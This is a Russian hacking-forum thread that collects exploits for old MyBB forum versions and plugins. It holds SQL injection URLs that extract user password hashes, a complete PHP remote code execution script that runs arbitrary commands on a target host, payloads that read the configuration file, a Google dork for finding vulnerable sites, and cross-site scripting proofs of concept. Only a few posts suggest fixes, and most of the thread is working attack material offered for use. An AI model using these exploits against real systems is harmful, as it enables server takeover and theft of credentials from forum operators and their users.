XDNET
Вернуться   xakepok.ru - Ethical Hacking - Cyber Security - Penetration Testing > UNDERGROUND > Этичный Хакинг и Пентестинг > Веб-приложений: Форумные движки, CMS (Порталы) и "СУБД"

Ответ
Опции просмотра Опции темы  
Старый 10.05.2008, 23:15   #1
Member Of Carding
 
Аватар для *Ni][
Группа:
 
Регистрация: 10.05.2008
Адрес: В ядре Linux
Сообщений: 85
Репутация: 99
По умолчанию Обзор уязвимостей "myBB"

MyBB <= 1.00 RC4
SQL Injection Exploit

Exploit:
[Ссылки могут видеть только зарегистрированные пользователи. ]
[Ссылки могут видеть только зарегистрированные пользователи. ]

MyBB 1.0.2
Название префикса таблиц
Код:
http://www.example.com/search.php?s=[de1aaf9b]&action=do_search&keywords=a&srchtype=3
MyBB 1.03
SQL-иньекция
[code]http://www.example.com/moderation.php?posts=[pid]|
Код:
&tid=[pid]&action=do_multimergeposts&sep=hr
MyBB <= 1.04
SQL-иньекция

Exploit:
[Ссылки могут видеть только зарегистрированные пользователи. ]

MyBB <= 1.1.2
SQL-иньекция
Код:
http://www.example.com/index.php?referrer=9999999999'%20UNION%20SELECT%20  password,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2  ,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7  ,8,9,0,1,2,3,4,5,6,7,8,9%20FROM%20mybb_users%20WHE  RE%20uid=1/*
MyBB 1.1.2
remote code execution

Exploit:
[Ссылки могут видеть только зарегистрированные пользователи. ]


MyBB <= 1.1.3
Create An Admin Exploit

Exploit:
[Ссылки могут видеть только зарегистрированные пользователи. ]

MyBB <= 1.1.5
'CLIENT-IP' SQL injection / create new admin exploit
Exploit:
[Ссылки могут видеть только зарегистрированные пользователи. ]

Mybb <= 1.2.2
Remote SQL Injecton Exploit v.2.0

[Ссылки могут видеть только зарегистрированные пользователи. ]
milw0rm

[Ссылки могут видеть только зарегистрированные пользователи. ]

[Ссылки могут видеть только зарегистрированные пользователи. ]

[Ссылки могут видеть только зарегистрированные пользователи. ]
securitylab.ru

MyBulletinBoard (MyBB) <= 1.2.10 Remote Code Execution Exploit

Код:
#!/usr/bin/php -q -d short_open_tag=on
<?php

// magic_quotes_gpc needs to be off

error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout",5);

if ($argc<5) {
print "-------------------------------------------------------------------------\r\n";
print "                 MyBB <= 1.2.10 Remote Code Execution Exploit\r\n";
print "-------------------------------------------------------------------------\r\n";
print "Usage: w4ck1ng_mybb.php [HOST] [PATH] [FORUM_ID] [COMMAND]\r\n\r\n";
print "[HOST] 	  = Target server's hostname or ip address\r\n";
print "[PATH] 	  = Path where MyBB is located\r\n";
print "[FORUM_ID] = Valid forum ID\r\n";
print "[COMMAND]  = Command to execute\r\n\r\n";
print "e.g. w4ck1ng_mybb.php victim.com /mybb/ 1 id\r\n";
print "-------------------------------------------------------------------------\r\n";
print "            		 http://www.w4ck1ng.com\r\n";
print "            		        ...Silentz\r\n";
print "-------------------------------------------------------------------------\r\n";
die;
}

//Props to rgod for the following functions

$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
function sendpacketii($packet)
{
  global $proxy, $host, $port, $html, $proxy_regex;
  if ($proxy=='') {
    $ock=fsockopen(gethostbyname($host),$port);
    if (!$ock) {
      echo 'No response from '.$host.':'.$port; die;
    }
  }
  else {
	$c = preg_match($proxy_regex,$proxy);
    if (!$c) {
      echo 'Not a valid proxy...';die;
    }
    $parts=explode(':',$proxy);
    echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
    $ock=fsockopen($parts[0],$parts[1]);
    if (!$ock) {
      echo 'No response from proxy...';die;
	}
  }
  fputs($ock,$packet);
  if ($proxy=='') {
    $html='';
    while (!feof($ock)) {
      $html.=fgets($ock);
    }
  }
  else {
    $html='';
    while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
      $html.=fread($ock,1);
    }
  }
  fclose($ock);
}

function make_seed()
{
   list($usec, $sec) = explode(' ', microtime());
   return (float) $sec + ((float) $usec * 100000);
}

$host = $argv[1];
$path = $argv[2];
$fid  = $argv[3];
$cmd  = $argv[4];
$cmd  = urlencode($cmd);
$port=80;$proxy="";

if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}
if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}

    $sql = "forumdisplay.php?fid=$fid&sortby=']=1;echo%20'*';%20system('$cmd');echo%20'*';%20\$orderarrow['";
    $packet ="GET " . $path . $sql . " HTTP/1.1\r\n";
    $packet.="Host: ".$host."\r\n";
    $packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727;)\r\n";
    $packet.="Connection: Close\r\n\r\n";
    sendpacketii($packet);

     $temp=explode("*",$html);
     $temp2=explode("*",$temp[1]);

    print "-------------------------------------------------------------------------\r\n";
    print "                MyBB <= 1.2.10 Remote Code Execution Exploit\r\n";    
    print "-------------------------------------------------------------------------\r\n";
    echo  $temp2[0];
    print "-------------------------------------------------------------------------\r\n";
    print "                          http://www.w4ck1ng.com\r\n";
    print "                                 ...Silentz\r\n";
    print "-------------------------------------------------------------------------\r\n";


?>

# milw0rm.com [2008-01-16]

MyBulletinBoard (MyBB) <= 1.2.10 Multiple Remote Vulnerabilities


1. Remote Code Execution in "forumdisplay.php":
Код:
http://localhost/mybb.1.2.10/forumdisplay.php?fid=2&sortby='
Example attacks:
Код:
http://localhost/mybb.1.2.10/forumdisplay.php?fid=2
&sortby='];phpinfo();exit;//
http://localhost/mybb.1.2.10/forumdisplay.php?fid=2
&sortby='];system('ls');exit;//
http://localhost/mybb.1.2.10/forumdisplay.php?fid=2
&sortby='];readfile('inc/config.php');exit;//
2. Remote Code Execution in "search.php":
Код:
http://localhost/mybb.1.2.10/search.php?action=results&sid=[valid sid here]
&sortby='
Example attacks:
Код:
http://localhost/mybb.1.2.10/search.php?action=results&sid=[valid sid here]
&sortby='];phpinfo();exit;//
http://localhost/mybb.1.2.10/search.php?action=results&sid=[valid sid here]
&sortby='];system('ls');exit;//
http://localhost/mybb.1.2.10/search.php?action=results&sid=[valid sid here]
&sortby='];readfile('inc/config.php');exit;//
milw0rm.com
*Ni][ вне форума   Ответить с цитированием
Старый 10.05.2008, 23:18   #2
Member Of Carding
 
Аватар для *Ni][
Группа:
 
Регистрация: 10.05.2008
Адрес: В ядре Linux
Сообщений: 85
Репутация: 99
По умолчанию

MyBB Plugin Custom Pages 1.0 Remote SQL Injection Vulnerability

Код:
###################################################################################
#										  #
# MyBulletin Board (MyBB) Plugin "Custom Pages 1.0" - SQL Injection Vulnerability #
#										  #
#    found by: Lidloses_Auge 							  #
#    Contact (ICQ):  120946783							  #
#    Greetz to: free-hack.com							  #
#										  #
###############################################################################################################################################
#																	      #
# Vulnerability:															      #
#																	      #
#    Document:      pages.php														      #
#    GET-Parameter: page														      #
#																	      #
# Dork:																	      #
#																	      #
#    inurl:"pages.php" + intext:"powered by mybb"											      #
#																	      #
# Example:																      #
#																	      #
#    http://[target]/pages.php?page='union/**/select/**/1,unhex(hex(concat_ws(0x202d20,username,password))),3,4,5,6,7/**/FROM/**/mybb_users/* #
#																	      #
# Notes:																      #
#																	      #
#    Successrate depends on the permissions which could be set for viewing the 'page'						              #
#																	      #
###############################################################################################################################################

# milw0rm.com [2008-04-06]

*Ni][ вне форума   Ответить с цитированием
Старый 02.12.2017, 15:03   #3
Супер-модератор
 
Аватар для Que$t
Группа: Member
 
Регистрация: 29.10.2017
Возраст: 30
Сообщений: 346
Репутация: 127
По умолчанию Re: Обзор уязвимостей "myBB"

MyBB 1.8.13 - Cross-Site Scripting Vulnerability


Код:
# Exploit Title: XSS in MyBB up to 1.8.13 via installer
# Date: Found on 05-29-2017
# Exploit Author: Pablo Sacristan
# Vendor Homepage: https://mybb.com/
# Version: Version > 1.8.13 (Fixed in 1.8.13)
# CVE : CVE-2017-16781
 
No HTML escaping when returning an $error in /install/index.php can
lead to an XSS which can be used to take over an attacker account.
 
The vulnerability occurs in /install/index.php:2503 and occurs because
there is no html encoding of the $error. A simple way to exploit this
is to create an error by using the Database Server Hostname and
inserting HTML characters there.
 
It is a POST XSS and this is a PoC:
<form name="x" action="http://target.com/install/index.php" method="post">
 
<input type="hidden" name='dbengine' value="mysqli">
<input type="hidden" name='config[mysqli][dbhost]' value="<img src=x onerror=alert(0)>">
<input type="hidden" name='config[mysqli][dbuser]' value="lol">
<input type="hidden" name='config[mysqli][dbpass]' value="lol">
<input type="hidden" name='config[mysqli][dbname]' value="lol">
<input type="hidden" name='config[mysqli][tableprefix]' value="lol">
<input type="hidden" name='config[mysqli][encoding]' value="utf8">
<input type="hidden" name='config[mysql][dbhost]' value="localhost">
<input type="hidden" name='action' value="create_tables">
 
</form>
 
<script>document.x.submit();</script>
 
Using this attack you can steal the cookies and you can install the MyBB server as you want, giving you almost full control over the MyBB server.
 
A simple fix would be to change the function error_list($array) to:
function error_list($array)
{
 $string = "<ul>\n";
 foreach($array as $error)
 {
            $string .= "<li>";
            $string .= htmlspecialchars($error);
            $string .= "</li>";
 }
 $string .= "</ul>\n";
 return $string;
}

#  0day.today [2017-12-02]  #
Que$t вне форума   Ответить с цитированием
Старый 23.05.2018, 00:31   #4
Супер-модератор
 
Аватар для Que$t
Группа: Member
 
Регистрация: 29.10.2017
Возраст: 30
Сообщений: 346
Репутация: 127
По умолчанию MyBB Latest Posts on Profile Plugin 1.1 - Cross-Site Scripting

MyBB Latest Posts on Profile Plugin 1.1 - Cross-Site Scripting


Код:
# Exploit Title: MyBB Latest Posts on Profile Plugin v1.1 - Cross-Site Scripting
# Date: 4/20/2018
# Author: 0xB9
# Contact: luxorforums.com/User-0xB9 or 0xB9[at]pm.me
# Software Link: https://community.mybb.com/mods.php?action=view&pid=914
# Version: 1.1
# Tested on: Ubuntu 17.10
# CVE: CVE-2018-10580
 
 
1. Description:
Adds a new section to user profiles that will display their last posts.
  
 
2. Proof of Concept:
 
Persistent XSS
- Create a thread with the following subject <script>alert('XSS')</script>
- Now visit your profile to see the alert.
 
 
3. Solution:
I reported the plugin twice over the past 3 weeks and recieved no response.
 
 
The following should be added in line 236 to properly sanitize thread subjects.
 
$d['tsubject'] = htmlspecialchars_uni($d['tsubject']);
Que$t вне форума   Ответить с цитированием
Ответ


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 
Опции темы
Опции просмотра

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход

Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обзор уязвимостей "WordPress" Lo0oL Веб-приложений: Форумные движки, CMS (Порталы) и "СУБД" 9 23.05.2018 00:30
Обзор уязвимостей "phpBB" PROPHET Веб-приложений: Форумные движки, CMS (Порталы) и "СУБД" 1 08.07.2008 19:05
Обзор уязвимостей "RunCMS" Lo0oL Веб-приложений: Форумные движки, CMS (Порталы) и "СУБД" 1 21.06.2008 07:27
Обзор уязвимостей "AuraCMS" Lo0oL Веб-приложений: Форумные движки, CMS (Порталы) и "СУБД" 4 06.06.2008 07:19
Обзор уязвимостей "Ipb" *Ni][ Веб-приложений: Форумные движки, CMS (Порталы) и "СУБД" 4 21.05.2008 10:02

Друзья

Текущее время: 06:44. Часовой пояс GMT +4.


"(c) xakepok.ru" (c) xakepok.ru Внимание! Все материалы, находящиеся на сайте, выложены исключительно в образовательных целях. Владельцы сайта не несут ответственность за использование информации в незаконных целях.
Мы не несём никакой ответственности за предоставленные материалы. При копировании информации обратная ссылка обязательна.
Powered by: vBulletin Version 3.8.1
Copyright ©2000 - 2017, vBulletin Solutions, Inc ~ Перевод: zCarot
Remix fluid style from X1mer@ for Hacket.Ru Взлом и Безопасность (c) xakepok.ru
Время генерации страницы 0.05958 секунды с 14 запросами